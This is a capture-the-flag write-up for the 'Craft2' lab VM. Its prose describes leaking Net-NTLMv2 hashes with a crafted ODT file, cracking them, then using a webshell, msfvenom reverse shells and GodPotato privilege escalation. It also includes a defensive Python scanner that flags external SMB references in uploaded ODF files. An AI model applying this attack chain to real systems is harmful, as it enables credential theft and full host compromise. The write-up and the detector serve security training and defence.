Craft2
Information
This Proving Grounds VM is an updated version of Craft which was a lot of fun!
Difficulty
Hard
Community Rating
Very Hard
Enumerated Ports & Services
Port  Proto  Service
80    TCP    Apache httpd 2.4.48
135   TCP    Microsoft DCE/RPC
445   TCP    Microsoft-DS/SMB


Findings
This host is the hardened version of the Craft VM. On Craft, you could send a macro-enabled .odt file that downloaded powercat and eventually gave a reverse shell. This time, the uploaded .odt was checked for macro phishing, so the vulnerability already leveraged in Craft was no longer accepted.
Badodt.py
After some digging I found badodt.py. It creates a malicious ODF document that can be used to leak Net-NTLMv2 credentials. I leveraged authentication from another user by sending an .odt file containing an SMB share reference pointed at my IP:
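The hardened host only checked the uploaded document for macros, which is why a macro-free document carrying an SMB share reference still got through. The check below is an added example of what an upload handler could run instead; it is not code from this writeup or from badodt.py. It treats an ODF package as the zip it is, parses every XML member, and flags any xlink:href that would make the office client contact another host (UNC paths, smb://, webdav://, file://host/share), alongside any embedded Basic/Scripts members. The sample documents, the documentation-range IP 192.0.2.10 and the function names are all constructed for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# ODF uses the XLink namespace for every external reference (images, objects, links).
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"

# Directories inside an ODF package that hold embedded Basic/script macros.
MACRO_PREFIXES = ("Basic/", "Scripts/")


def is_remote_ref(href):
    """True if an xlink:href would make the office client contact another host."""
    h = href.strip()
    if h.startswith("\\\\") or h.startswith("//"):
        return True  # bare UNC path: \\host\share\file or //host/share/file
    m = re.match(r"^(smb|cifs|webdav|davs?|file)://(.*)$", h, re.IGNORECASE)
    if not m:
        return False  # relative package path, http(s) hyperlink, etc.
    scheme, rest = m.group(1).lower(), m.group(2)
    if scheme != "file":
        return True  # smb://, cifs://, webdav://, dav(s):// always reach out
    # file:///C:/... is local; file://host/share and file:////host/share are UNC.
    return rest.startswith("//") or (rest != "" and not rest.startswith("/"))


def scan_odt(data):
    """Scan ODF package bytes; return remote references, macro members and a verdict."""
    findings = {"remote_refs": [], "macros": [], "unparseable": [], "risky": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.startswith(MACRO_PREFIXES):
                findings["macros"].append(name)
            if not name.endswith(".xml"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                findings["unparseable"].append(name)  # fail closed on malformed XML
                continue
            for el in root.iter():
                href = el.get(XLINK_HREF)
                if href is not None and is_remote_ref(href):
                    tag = el.tag.split("}")[-1]  # drop the namespace for readability
                    findings["remote_refs"].append((name, tag, href))
    findings["risky"] = bool(
        findings["remote_refs"] or findings["macros"] or findings["unparseable"]
    )
    return findings


def build_sample_odt(href, with_macro=False):
    """Constructed minimal ODT: one paragraph and one image reference (no real tool)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        content = (
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<office:document-content '
            'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
            'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
            'xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" '
            'xmlns:xlink="http://www.w3.org/1999/xlink">'
            "<office:body><office:text><text:p>hello</text:p>"
            '<draw:frame><draw:image xlink:href="' + escape(href, {'"': "&quot;"}) + '"/>'
            "</draw:frame></office:text></office:body></office:document-content>"
        )
        z.writestr("content.xml", content)
        if with_macro:
            # Constructed stand-in for a stored Basic module.
            z.writestr(
                "Basic/Standard/Module1.xml",
                '<script:module xmlns:script="http://openoffice.org/2000/script" '
                'script:name="Module1"/>',
            )
    return buf.getvalue()


if __name__ == "__main__":
    clean = build_sample_odt("Pictures/logo.png")
    # Constructed UNC reference to a documentation-range address.
    leaky = build_sample_odt("\\\\192.0.2.10\\share\\logo.png", with_macro=True)
    for label, doc in (("clean", clean), ("leaky", leaky)):
        print(label, scan_odt(doc))
```

Running the block prints a clean verdict for the first document and a risky one for the second, listing the image element whose href points at a UNC path and the stored Basic module. The point for the hardening described above is that the macro directories and the external references are independent signals; a check that only looks for the first still lets the second kind of document trigger an outbound SMB authentication when it is opened.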

This allowed me to grab the Net-NTLMv2 hash of the thecybergeek user:

I grabbed one of the hashes and used hashcat to crack it:

After cracking the hash, I confirmed the credentials were working with crackmapexec smb and enumerated the shares:

Once the shares were enumerated, I gained access with smbclient:

I tried to upload a file and it was successful. I uploaded a webshell and an msfvenom executable to gain a reverse shell through metasploit:

After uploading shell.php and the msfvenom executable, I executed the binary to gain shell access:


Got the first flag under the apache user's desktop:

Since I had the user credentials obtained from the mock SMB server, I used the RunasCs executable to run a command as that user and check the user's privileges:

Perfect! The user has SeImpersonatePrivilege. I downloaded nc.exe to the Users/Public directory and executed nc as that user, gaining a reverse shell in the user's context:

After gaining access as the user, I downloaded GodPotato.exe to attempt privilege escalation, since the user had SeImpersonatePrivilege.

Privilege Escalation
Booyah. I ran GodPotato.exe with the downloaded nc.exe in Users/Public to chain the privilege escalation into a reverse shell:



Final Notes
References